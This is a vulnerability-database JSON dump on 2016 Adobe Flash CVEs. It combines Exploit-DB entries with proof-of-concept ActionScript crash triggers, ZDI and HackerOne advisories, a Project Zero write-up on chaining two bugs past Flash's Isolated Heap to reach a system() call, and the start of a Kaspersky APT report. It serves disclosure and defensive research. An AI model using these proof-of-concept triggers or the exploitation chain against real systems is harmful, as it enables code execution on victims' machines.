exploits for multiple platform", "published": "2016-02-17T00:00:00", "type": "exploitdb", "title": "Adobe Flash - LoadVars.decode Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0974"], "modified": "2016-02-17T00:00:00", "id": "EDB-ID:39463", "href": "https://www.exploit-db.com/exploits/39463/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=667\r\n\r\nThere is a use-after-free in LoadVars.decode. If a watch is set on the object that the parameters are being decoded into, and the watch deletes the object, then other methods are called on the deleted object after it is freed. A PoC is as follows:\r\n\r\nvar lv = new LoadVars();\r\nvar f = lv.decode;\r\nvar tf = this.createTextField(\"tf\",1, 2, 3, 4, 5);\r\ntf.natalie = \"not test\";\r\ntf.watch(\"natalie\", func);\r\nf.call(tf, \"natalie=test&bob=1\");\r\ntrace(tf.natalie);\r\n\r\n\r\nfunction func(){\r\n\t\r\n\ttrace(\"here\");\r\n\ttf.removeTextField();\t\r\n\treturn \"test\";\r\n\r\n\t}\r\n\t\r\n\r\nA sample swf and fla are attached. This issue was reproduced in Chrome on 64-bit Ubuntu.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39463.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39463/"}, {"lastseen": "2016-02-21T18:25:33", "description": "Adobe Flash - H264 File Stack Corruption. CVE-2016-0967. Dos exploits for multiple platform", "published": "2016-02-17T00:00:00", "type": "exploitdb", "title": "Adobe Flash - H264 File Stack Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0967"], "modified": "2016-02-17T00:00:00", "id": "EDB-ID:39466", "href": "https://www.exploit-db.com/exploits/39466/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=633\r\n\r\nThe attached flv file causes stack corruption when loaded into Flash. To use the PoC, load LoadMP42.swf?file=lownull.flv from a remote server.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39466.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39466/"}, {"lastseen": "2016-02-21T18:24:56", "description": "Adobe Flash - Out-of-Bounds Image Read. CVE-2016-0965. Dos exploits for multiple platform", "published": "2016-02-17T00:00:00", "type": "exploitdb", "title": "Adobe Flash - Out-of-Bounds Image Read", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0965"], "modified": "2016-02-17T00:00:00", "id": "EDB-ID:39460", "href": "https://www.exploit-db.com/exploits/39460/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=630\r\n\r\nThe attached file can cause an out-of-bounds read of an image. While the bits of the image are null, the width, height and other values can make it a valid pointer. \r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39460.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39460/"}, {"lastseen": "2016-02-21T18:25:10", "description": "Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer. CVE-2016-0984. Dos exploits for multiple platform", "published": "2016-02-17T00:00:00", "type": "exploitdb", "title": "Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0984"], "modified": "2016-02-17T00:00:00", "id": "EDB-ID:39462", "href": "https://www.exploit-db.com/exploits/39462/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=698\r\n\r\nThere is a dangling pointer that can be read, but not written to in loadPCMFromByteArray. A minimal PoC is as follows:\r\n\r\n\tvar s = new Sound();\r\n\tvar b = new ByteArray();\r\n\tfor( var i = 0; i < 1600; i++){\r\n\t\tb.writeByte(1);\r\n\t}\r\n\tb.position = 0;\r\n\ts.loadPCMFromByteArray(b, 100, \"float\", false, 2.0);\r\n\tvar c = new ByteArray();\r\n\tfor(var i = 0; i < 2; i++){\r\n\t\t\tc.writeByte(1);\t\r\n\t}\r\n\tc.position = 0;\r\n\ttry{\r\n\t\ts.loadPCMFromByteArray(c, 1, \"float\", false, 2.0);\r\n\t}catch(e:Error){\t\t\r\n\t\ttrace(e.message);\r\n\t}\r\n\t\t\t\r\n\tvar d = new ByteArray();\r\n\ts.extract(d, 1, 0);\r\n\r\nThe PoC first loads PCM bytes correctly, setting an internal pointer to them. It then loads PCM bytes again, with a specific array length that passes the array length check, but then causes a exception to be thrown when reading the byte array. This causes the pointer to the original PCM array to be deleted, but then the function exits due to an exception before the pointer is set again. If the exception is caught, the sound object containing the dangling pointer can be used again. The sound.extract method reads directly out of the location the dangling pointer points to.\r\n\r\nA full PoC and swf are attached.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39462.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39462/"}, {"lastseen": "2016-02-21T18:25:01", "description": "Adobe Flash -TextField Constructor Type Confusion. CVE-2016-0985. Dos exploits for multiple platform", "published": "2016-02-17T00:00:00", "type": "exploitdb", "title": "Adobe Flash -TextField Constructor Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0985"], "modified": "2016-02-17T00:00:00", "id": "EDB-ID:39461", "href": "https://www.exploit-db.com/exploits/39461/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=701\r\n\r\nThere is a type confusion vulnerability in the TextField constructor in AS3. When a TextField is constructed, a generic backing object is created and reused when subsequent TextField objects are created. However, if an object with the same ID has already been created in the SWF, it can be of the wrong type. The constructor contains a check for this situation, though, and throws an exception and sets a flag to shut down the player if this occurs. The backing object is then set to be of type TextField to avoid any modifications that have been made on it by the constructor from causing problems if it is used as an object of its original type elsewhere in the player.\r\n\r\nHowever, if the exception thrown by the constructor is caught, the exception handler can create another TextField object, and since the type of the generic backing object has been changed, an object of the wrong type is now backing the TextField, which makes it possible to set the pointers in the object to integer values selected by the attacker.\r\n\r\nThe PoC swf for this issue needs to be created by hand. The original swf code is:\r\n\r\ntry{\r\n\r\n var t = new TextField();\r\n\r\n} catch(e:Error){\r\n\r\n var t2 = new TextField();\r\n t2.gridFitType;\r\n\r\n}\r\n\r\nThen in the swf, a backing object of a different type with ID 0xfff9 is created, which causes the first constructor call to fail, and the second to cause type confusion.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39461.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39461/"}], "zdi": [{"lastseen": "2020-06-22T11:42:03", "bulletinFamily": "info", "cvelist": ["CVE-2016-0975"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of instanceof. The issue lies in the failure to safely hold a reference to arguments during execution of the function. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.", "modified": "2016-06-22T00:00:00", "published": "2016-02-09T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-16-160/", "id": "ZDI-16-160", "title": "Adobe Flash instanceof Use-After-Free Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:42:06", "bulletinFamily": "info", "cvelist": ["CVE-2016-0973"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of URLRequest objects. By calling URLLoader.load on a URLRequest object, an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.", "modified": "2016-06-22T00:00:00", "published": "2016-02-09T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-16-161/", "id": "ZDI-16-161", "title": "Adobe Flash URLRequest Use-After-Free Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2019-11-20T17:03:06", "bulletinFamily": "bugbounty", "bounty": 2000.0, "cvelist": ["CVE-2016-0982"], "description": "I. Summary\nAdobe Flash Player is prone to a vulnerability which leads to Use-After-Free. \n------------------------------------------------------------------\nII. Description\nIf the ASnative(900,1) is invoked with MovieClip instance and getter properties associated with swfRoot where the getter method includes a call to removeMovieClip(), the MovieClip instance is used after it is freed.\n\nLatest version of Adobe Flash Player 20.0.0.267 has been tested under Windows 7.\n------------------------------------------------------------------\nIII. Impact\nUse-After-Free\n------------------------------------------------------------------\nIV. Credit\nWen Guanxing from Venustech ADLAB is credited for this vulnerability.\n\nIt has been assigned by Adobe as CVE-2016-0982\nhttps://helpx.adobe.com/security/products/flash-player/apsb16-04.html", "modified": "2019-11-12T09:43:04", "published": "2016-03-01T08:01:33", "id": "H1:119653", "href": "https://hackerone.com/reports/119653", "type": "hackerone", "title": "Flash (IBB): Adobe Flash Player ASnative(900,1).call(MovieClip) Use-After-Free Vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-20T17:03:06", "bulletinFamily": "bugbounty", "bounty": 2000.0, "cvelist": ["CVE-2016-0983"], "description": "I. Summary\nAdobe Flash Player is prone to a vulnerability which leads to Use-After-Free. \n------------------------------------------------------------------\nII. Description\nIf the ASnative(900,1) is invoked with TextField instance and getter properties associated with swfRoot where the getter method includes a call to removeTextField(), the TextField instance is used after it is freed.\n\nThe zip attachment contains the crash.swf and its source code.\nLatest version of Adobe Flash Player 20.0.0.267 has been tested under Windows 7.\n------------------------------------------------------------------\nIII. Impact\nUse-After-Free\n------------------------------------------------------------------\nIV. Credit\nWen Guanxing from Venustech ADLAB is credited for this vulnerability.\n\nIt has been assigned by Adobe as CVE-2016-0983\nhttps://helpx.adobe.com/security/products/flash-player/apsb16-04.html", "modified": "2019-11-12T09:43:04", "published": "2016-03-01T08:03:36", "id": "H1:119655", "href": "https://hackerone.com/reports/119655", "type": "hackerone", "title": "Flash (IBB): Adobe Flash Player ASnative(900,1).call(TextField) Use-After-Free Vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-20T17:03:06", "bulletinFamily": "bugbounty", "bounty": 5000.0, "cvelist": ["CVE-2016-0981"], "description": "I. Summary\nAdobe Flash Player is prone to a vulnerability which leads to Memory Corruption. \n------------------------------------------------------------------\nII. Description\nWhen ASnative(101,10) is called with a MovieClip object pointer, Flash Player is crashed due to an invalid EIP value. Carefully crafted swf file may allow the attacker to hijack the EIP, leading to shellcode execution in the context of affected application. \n\nLastest version of Adobe Flash Player 20.0.0.267 has been tested under Windows 7.\n------------------------------------------------------------------\nIII. Impact\nMemory Corruption\n------------------------------------------------------------------\nIV. Credit\nWen Guanxing from Venustech ADLAB is credited for this vulnerability.\n\nIt has been assigned as CVE-2016-0981 by Adobe.\nhttps://helpx.adobe.com/security/products/flash-player/apsb16-04.html\n", "modified": "2019-11-12T09:43:09", "published": "2016-03-01T07:57:50", "id": "H1:119652", "href": "https://hackerone.com/reports/119652", "type": "hackerone", "title": "Flash (IBB): Adobe Flash Player ASnative(101,10) Memory Corruption Vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:21:29", "bulletinFamily": "info", "cvelist": ["CVE-2016-0984", "CVE-2016-0998"], "description": "Posted by Natalie Silvanovich, Mourner of Lost Exploits\n\n \n\n\nOver the past few months, Adobe has introduced a number of [changes](<https://blogs.adobe.com/security/tag/heap-isolation>) to the Flash Player heap with the goal of reducing the exploitability of certain types of vulnerabilities in Flash, especially use-after-frees. I wrote an exploit involving two bugs discovered after the Isolated Heap was implemented to explore how it impacts their exploitability.\n\n# The Isolated Heap\n\n** \n**\n\nThe Flash heap, [MMgc](<https://developer.mozilla.org/en-US/docs/Archive/MMgc>), is a garbage collected heap that also supports unmanaged fixed allocations. In the past, there have been many exploits in the wild that used certain properties of the heap to aid exploitation. In particular, many [exploits](<https://0b3dcaf9-a-62cb3a1a-s-sites.googlegroups.com/site/zerodayresearch/smashing_the_heap_with_vector_Li.pdf?attachauth=ANoY7cqJuxIdzdr9r2FUBjPwrbRuEiRHkb93MO3MKyOJSXWISkoMK0Swma6ODx4OC1ZqzMxcQDI7MzSVSR9whu6tYH_DKIRxxRYPeuXC1fYVI6fz2VNVHUJnL4MxYX8emXsHaQ8Ec9etfNGff3KtUdw5X-QfZ7QtYs5b0fBFy5Z-MBXrxU9WZlFFXLkoCcrHeU0WVoj-OFNX_p6cqmkQgCLiHc8Wg6RQhnZu8N_9Nrl32jOuxqHfmT3INnoH33FWadmLL5uFMiCx&attredirects=0>) used the allocation properties of Vectors to gain read/write access to the entire Flash memory space via heap memory corruption bugs. Exploits that use other object types, such as ByteArray and BitmapData have also been seen in the wild.\n\n** \n**\n\nMMgc was originally implemented as a type and size bucketed allocator. When memory is requested, the allocator that is called depends on the type of memory that is needed. This is related to the garbage collection properties of the memory. If it is not garbage collected, the Fixed allocator is used, otherwise the Garbage-Collected (GC) allocator is used. Within the GC allocator, there are about eight subtypes of memory that can be allocated, related to whether the memory contains pointers and whether those pointers have custom finalizers or GC routines that need to be called. Within each type, the request is sorted by size, and the memory is allocated on a heap page for that size. Large requests are allocated on their own page.\n\n** \n**\n\nThe Isolated Heap introduces partitioning to the heap, essentially a third factor which determines where memory is allocated. There is separate memory for each partition, which is then split into subsections for different types and sizes. The goal of partitioning is to allocate objects that are likely to contain memory corruption bugs in a different area of memory than objects that are likely to be useful in exploiting memory corruption bugs, and generally add more entropy to the heap.\n\n** \n**\n\nThere are currently three partitions on the heap. The first partition is generally used for objects that contain pointers: script objects, their backing GC-memory and certain pointer arrays. The second partition is used for objects that contain non-pointer data, mostly arrays of primitive types. The third partition is used for a small number of objects that have a history of being used in exploits. These are typically variable-sized data buffer objects. Outside of the Isolated Heap, checksumming has also been implemented to detect and abort if certain sensitive objects are ever altered.\n\n** \n**\n\n# CVE-2016-0998\n\n** \n**\n\n[CVE-2016-0998](<https://code.google.com/p/google-security-research/issues/detail?id=716>) was discovered by Mateusz Jurczyk and I while fuzzing the Flash Player (full code for the exploit can be found [attached](<https://bugs.chromium.org/p/project-zero/issues/detail?id=716#c4>) to this bug). It was reported to Adobe on February 3, 2016 and fixed by Adobe on March 10, 2016. It is a good example of a bug that the Isolated Heap makes more difficult to exploit.\n\n** \n**\n\nThe bug is an uninitialized variable in the fix to an ActionScript 2 use-after-free bug. Roughly 80 of these types of issues have been fixed by Adobe in the past year, and two uninitialized variable issues were introduced in the fixes. \n\n** \n**\n\nThis issue is fairly easy to reproduce, a proof-of-concept for this issue in its entirety is:\n\n** \n**\n\nvar o = {};\n\no.unwatch();\n\n** \n**\n\nThe bug occurs because the use-after-free check in the unwatch method attempts to convert its first parameter to a string by calling toString on it before continuing with the part of the method where toString could cause problems by freeing an object. However, Flash does not check that this parameter exists before calling toString on it. In pseudo-code, the rough behaviour of this method is:\n\n** \n**\n\nvoid* args = alloca( args_size );\n\nfor( int i = 0; i &lt; args_size; i++){\n\n// Init args\n\n}\n\n \n\n\nif ( ((int) args[0]) &amp; 6 == 6 )\n\nargs[0] = call_toString( args[0] );\n\n \n\n\nif ( args_size &lt; 1)\n\nexit();\n\n** \n**\n\nThere\u2019s a few interesting things to note about this bug. First, on Flash, alloca(0) allocates 16 bytes (the minimum allowed size), but the initialization loop doesn\u2019t run, so this memory contains whatever was on the stack the last time this memory was used, which is not part of the current call. Second, the vulnerable behaviour only occurs if the object on the stack ends in 6. The purpose of this behaviour is to ensure that the parameter is a ScriptObject -- Flash arguments can be many types, such a strings, integers, objects, etc., and the last three bits of the value indicates its type, with 6 indicating a ScriptObject. Finally, this bug bails pretty quickly if the argument array is too small. There\u2019s only one function, call_toString that\u2019s called on the uninitialized value. This function searches through the ScriptObject\u2019s variables for a method called toString, and then calls it, calling some virtual methods in the process.\n\n** \n**\n\nWith the above constraints, there are a few ways to exploit this bug:\n\n** \n**\n\n 1. Put an absolute pointer value on the stack. The benefit of this is that you can guarantee that it ends in 6. The downside is that you need a separate bug to bypass ASLR, because there\u2019s no way to get your bearings otherwise\n\n 2. Put a pointer to some type of object or buffer that is not a ScriptObject on the stack, and use type confusion for the exploit. This is somewhat challenging for this particular bug, because valid pointers that end in 6 are unusual on the stack, as most of the time they are aligned. The only situation where unaligned pointers are typically on the stack is when manipulating data buffers such as strings where each byte is accessed individually.\n\n 3. Make this bug into a use-after-free. Put a stale pointer to a ScriptObject on the stack and wait for it to be freed and reallocated, and then use type confusion for the exploit\n\n** \n**\n\nOption 2 seemed the most practical up front, but the Isolated Heap posed some challenges. As noted above, if a call puts an unaligned pointer on the stack, it is probably manipulating some sort of byte data that does not contain pointers, as pointer access needs to be aligned. So it is probably possible to make args[0] point to a buffer type, such as a ByteArray in ActionScript, but ASLR is still a problem, because call_toString calls virtual functions on args[0] , and without knowing the location of any code addresses, the address in the buffer that will be treated as a vtable can\u2019t be set to a reasonable value. One possible way of solving this problem would be to have args[0] point to a buffer, and then realloc it to be something else that has a valid vtable, but all script-controllable byte buffers are allocated in partition 3, which is not used for any other data types that contain pointers, so this isn\u2019t possible with the Isolated Heap.\n\n** \n**\n\nI then tried Option 3, and tried to reallocate a different object in the place of a ScriptObject. This bug more amenable to this than a lot of other bugs, because there\u2019s no limitation to when the object needs to be reallocated, other than it needs to be reallocated after the pointer to it is outside of the valid stack (i.e. the stack pointer is higher than the address of the value), and it needs to remain allocated until it is used by the bug. These constraints aren\u2019t very limiting, as basically any object in the Flash Player can be allocated in this window. That said, only allocations with the same partition, type and size as a ScriptObject will be allocated in the freed memory. Looking at object allocations in Flash, only about 10 other objects have these properties, and they all extend the same class, the AS3 ScriptObject class (which is different from the AS2 ScriptObject that is freed). Unfortunately though, the first virtual function that this bug calls on the reallocated buffer maps to [ScriptObject::getDescendants](<https://github.com/nxmirrors/tamarin-central/blob/master/core/ScriptObject.cpp>), which immediately throws an ActionScript 3 exception, which leads to a null pointer crash, because exception handlers haven\u2019t been properly initialized. So in this case, there isn\u2019t an appropriate object that can be allocated in the place of an AS3 ScriptObject that can make this bug exploitable as a use-after-free.\n\n** \n**\n\nAt this point, I didn\u2019t think it was very likely that this bug would be exploitable without a second information leak vulnerability, so I tried exploiting it with a second bug.\n\n** \n**\n\n# CVE-2016-0984\n\n** \n**\n\n[CVE-2016-0984](<https://code.google.com/p/google-security-research/issues/detail?id=698>) is a use-after-free in sound processing in which the freed buffer can only be read. I reported CVE-2016-0984 on January 11, 2016 and Adobe released a patch on February 16, 2016.\n\n** \n**\n\nA proof-of-concept for the bug is as follows:\n\n** \n**\n\nvar s = new Sound(); \nvar b = new ByteArray(); \nfor( var i = 0; i &lt; 1600; i++){ \nb.writeByte(1); \n} \nb.position = 0; \ns.loadPCMFromByteArray(b, 100, \"float\", false, 2.0); \nvar c = new ByteArray(); \nfor(var i = 0; i &lt; 2; i++){ \nc.writeByte(1); \n} \nc.position = 0; \ntry{ \ns.loadPCMFromByteArray(c, 1, \"float\", false, 2.0); \n}catch(e:Error){ \ntrace(e.message); \n} \n \nvar d = new ByteArray(); \ns.extract(d, 1, 0);\n\n** \n**\n\nThis bug is related to exception handling in the loadPCMFromByteArray method. This method loads sound data from an array that is provided by ActionScript, and then processes it, and stores it internally in the Sound object. The general flow of the function is as follows:\n\n** \n**\n\nif ( input_size &lt; needed_size ){ // needed_size is wrong\n\nthrowASException();\n\n}\n\n \n\n\ndelete[] m_pcm;\n\nchar* sound_data = new char[input_size];\n\n \n\n\nfor( int i = 0; i &lt; input_size; i++){\n\nsound_data = inputArray.readStuff(); // can throw exception\n\n}\n\n \n\n\nm_pcm = sound_data; \n\n** \n**\n\nThe code attempts to check that the array is the right size and throws an exception before it does any pointer manipulation, but there is an arithmetic error in how the size is calculated, so some situations in which the array is too small will get through (see the [tracker](<https://code.google.com/p/google-security-research/issues/detail?id=698>) for exact details on how to trigger this condition). In this case, the input array will throw an exception when it is read, which means that m_pcm will be freed but not reallocated. This is a fairly versatile bug, in that the array that is freed can be of any size, though it is always a character array in partition 2, the data heap.\n\n** \n**\n\nThe first step was to use this bug to obtain the address of a vtable to break ASLR. It wasn\u2019t immediately obvious how to do this, as the heap partition the array is allocated if generally used for primitive arrays. There were two exceptions to this I was aware of. First, arrays of pointer that aren\u2019t void pointers are allocated on this heap, but this isn\u2019t particularly helpful for this bug, as they tend to be pointers to other primitive data types, and even if they were pointers to objects, there\u2019s no way to use this bug to iterate through pointers, it can only be used to read values off the heap without knowing their location. Another property I noticed is that object arrays are also allocated in this partition, so if an array of objects that call virtual methods (or contain function pointers) is allocated, you could read the code pointers off of the heap. When I looked though, I couldn\u2019t find a single array of virtual objects allocated in a way that is script-controllable in Flash, as arrays of pointers are usually used instead.\n\n** \n**\n\nEventually, I discovered that the ActionScript JIT LIR implements its own [basic heap](<https://github.com/nxmirrors/tamarin-central/blob/master/nanojit/Allocator.h>), and allocates new pages as large char arrays, which are allocated in the same heap partition as other char arrays. These pages have variable sizes, and often contain objects with vtables. By selecting a PCM array allocation size that lines up with a frequent LIR allocation, I was able to read a vtable off the heap.\n\n** \n**\n\nThe next step was to get a pointer to a buffer I could control in script. It is possible to also use CVE-2016-0998 for this, but I suspected that using this bug could do it more simply and reliably. Since arrays of char pointers are allocated on the same heap partition as sound PCM data, char pointers could be easily read. I used the AS3 function [LocaleID.determinePreferredLocales](<http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/globalization/LocaleID.html#determinePreferredLocales\\(\\)>) to allocate a char* array based on the String vector that is provided as input. Unfortunately though, ActionScript strings aren\u2019t ideal for exploits. They are immutable after they are allocated, and worse, they terminate as soon as a NULL character is reached, which means on 64-bit systems, they can only ever contain one pointer. The best solution to this would be to allocate an array of pointers to something more controllable, such as a byte or int Array, but unfortunately in ActionScript, arrays of these types of pointers are fairly unusual, and when they exist, their size is usually not controllable from script. So instead, I reallocated the string data that the char pointers pointed to, so that they were integer arrays instead. This was possible in part because the strings allocated internal to the LocaleID.determinePreferedLocales method are not true Flash strings that are accessible via script, but character arrays, so they show up in partition 2 of the heap (the data partition) as opposed to partition 3 (the exploitable objects partition).\n\n** \n**\n\nI used the [BitmapData.paletteMap](<http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/display/BitmapData.html#paletteMap\\(\\)>) method to allocate integer arrays in the place of the character arrays allocated by LocaleID.determinePreferedLocales. This method accepts input of four integer arrays of size 256, and copies them to a larger int array of length 1024. These arrays are not mutable, but since the vtable pointer, and the pointer to the buffer have been determined at this point, it doesn\u2019t matter, as all values that need to be in the array can be calculated before the array is created. Another undesirable property of this method is that the arrays are freed at the end, but there is a trick for getting around it. If any element of the arrays provided to the method is not an integer, Flash will attempt to call valueOf on it to convert it to a number. So if a late element (for example, the last element of the fourth array) has a valueOf that throws an exception, execution of the method will stop. In this case, the large int array will be allocated, and most of the input will be copied to it, but the part of the function that processes and frees the arrays will be skipped. This is a useful trick to avoid objects being freed that works in a lot of methods.\n\n** \n**\n\nAt this point, we have a pointer to a vtable, and a pointer to a buffer we control, so it\u2019s fairly straightforward to gain code execution using CVE-2016-0998\n\n# Putting it all together\n\n** \n**\n\nFor CVE-2016-0998 to use the allocated buffer, a pointer to it with the final three bits set to 6 needs to be put on the stack. There are a few ways to do this, one of them being UTF conversion. UTF-8 to UTF-16 conversion is done on the stack if the length of resulting UTF-16 string is less than 256 bytes, which leads to the character values of the string being written to the stack.\n\n** \n**\n\nTo start off, my exploit grows the stack. This is just to avoid any values that have already been written from causing problems. This isn\u2019t as straightforward as one would expect. The ActionScript stack is not the same as the C++ stack (where this bug occurs), so calling a function recursively in ActionScript won\u2019t grow it. Instead, there needs to be a loop in C++. To cause this, I triggered a situation where toString would be called recursively, which would be done in C++. In ActionScript:\n\n** \n**\n\n_global.v = 31;\n\n_global.mc = this;\n\nvar o = {toString : f};\n\nthis.swapDepths(o);\n\n** \n**\n\nfunction f(){\n\nif(_global.v &gt; 0){\n\n_global.v = _global.v - 1;\n\n_global.mc.swapDepths(this);\n\n}else{\n\n** \n**\n\nvar t = _global.mc;\n\nt.swapDepths(d, 2);\n\n}\n\nreturn \n\n\"ffffffffffffffffffffffffffffffffffffffffffffffffffffffff\";\n\n}\n\n** \n**\n\nThis code calls swapDepths, which calls toString from C++, which then recursively calls swapDepths again, growing the stack. \n\n** \n**\n\nThe value that is returned from this type of function then gets converted from UTF-8 to UTF-16, so its contents get put on the stack. This can be used to put the pointer to the the controllable buffer on the stack. Unfortunately, conversion only happens if the String is encoded statically in the SWF, a string generated during AS execution won\u2019t work. So a SWF needs to dynamically be created as a part of the exploit. \n\n** \n**\n\nThis process can be seen in [test.cgi](<https://bugs.chromium.org/p/project-zero/issues/detail?id=716>). The first part of the exploit, soundPCM.swf uses CVE-2016-0984 to break ASLR and create a buffer, and then it passes the location of the buffer to test.cgi via URL parameters in JavaScript. This calls into Python, and adds the correct address into a static string in a SWF called new.swf. Note that a UTF-8 converter is implemented in Python, this is because standard UTF encoding leads to characters of different lengths, and putting different lengths of strings into the SWF causes \u201cmovement\u201d in memory when it is loaded, which can cause problems with the exploit which relies on static offsets. The implemented converter always creates three-byte UTF-8 encodings even if a shorter one is possible based on the specific buffer pointer value. Also note that the full string in the SWF will not get fully converted, because the 0x0000 value at the beginning of the 64-bit pointer will be treated as a null, and processing will stop. This isn\u2019t ideal, it means that only one pointer can ever be copied to the stack, but it is a constraint that can be worked around.\n\n** \n**\n\nAt this point, we have a SWF that puts a pointer to the buffer on the stack, we now just need to trigger the exploit. I encoded this into the same SWF for simplicity. Once the SWF has been created, it is loaded once with URL parameter num=15, which sets up the stack, and then with URL parameter num=14, which triggers the bug, causing native toString to be called on the buffer that\u2019s provided.\n\n# What\u2019s in the buffer\n\nThe last step is to figure out what to put in the buffer. Running through the native call, there\u2019s a few pointers that need to be set to something valid to avoid crashes (I pointed them back to various locations in the same buffer), and then a virtual call is made to the buffer. Setting the memory at the head of the buffer the call sees as the vtable to a location later in the buffer, and creating a fake vtable in that memory, it\u2019s possible to make a call into a gadget. This exploit uses the following one:\n\n** \n**\n\nmov rdi, rax\n\ncall [rax + 0x28]\n\n** \n**\n\nThis sets rdi to the head of the vtable, which is set to a string command, and then rax + 0x28 (0x28 bytes into the vtable) is set a location which calls system in the Flash plug-in, which triggers a call to system.\n\n# Conclusion\n\n \n\n\nThe Isolated Heap made exploiting CVE-2016-0998 more difficult and time consuming, and also made exploitation require a separate information leak bug, which probably would not have been required before the heap changes. There are a couple weaknesses in the Isolated heap, especially the use of the data partition for JIT allocation, and allocating pointer arrays on the data heap. We are working with Adobe to implement improvements to the Isolated Heap in future versions of Flash. It is challenging to harden a heap against exploitation, especially in the face of high-quality bugs, but the Isolated Heap is a substantial improvement.\n\n \n\n", "modified": "2016-03-28T00:00:00", "published": "2016-03-28T00:00:00", "id": "GOOGLEPROJECTZERO:3CC5C12B80F69A02CA55F9CCF64DF766", "href": "https://googleprojectzero.blogspot.com/2016/03/life-after-isolated-heap.html", "type": "googleprojectzero", "title": "\nLife After the Isolated Heap\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2017-10-16T15:16:55", "bulletinFamily": "blog", "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-11292", "CVE-2017-8759"], "description": "\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Introduction\n\nKaspersky Lab has always worked closely with vendors to protect users. As soon as we find new vulnerabilities we immediately inform the vendor in a responsible manner and provide all the details required for a fix.\n\nOn October 10, 2017, Kaspersky Lab's advanced exploit prevention systems identified a new Adobe Flash zero day exploit used in the wild against our customers. The exploit was delivered through a Microsoft Office document and the final payload was the latest version of FinSpy malware. We have reported the bug to Adobe who assigned it [CVE-2017-11292 and released a patch](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) earlier today:\n\n[](<https://securelist.com/files/2017/10/cve_2017_11292_credits.png>)So far only one attack has been observed in our customer base, leading us to believe the number of attacks are minimal and highly targeted.\n\nAnalysis of the payload allowed us to confidently link this attack to an actor we track as \"BlackOasis\". We are also highly confident that BlackOasis was also responsible for another zero day exploit (CVE-2017-8759) discovered by [FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) in September 2017. The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye.\n\n## BlackOasis Background\n\nWe first became aware of BlackOasis' activities in May 2016, while investigating another Adobe Flash zero day. On May 10, 2016, Adobe [warned](<https://helpx.adobe.com/security/products/flash-player/apsa16-02.html>) of a vulnerability (CVE-2016-4117) affecting Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. The vulnerability was actively being exploited in the wild.\n\nKaspersky Lab was able to identify a sample exploiting this vulnerability that was uploaded to a multi scanner system on May 8, 2016. The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and install a program from a remote C&amp;C server. Although the exact payload of the attack was no longer in the C&amp;C, the same server was hosting multiple FinSpy installation 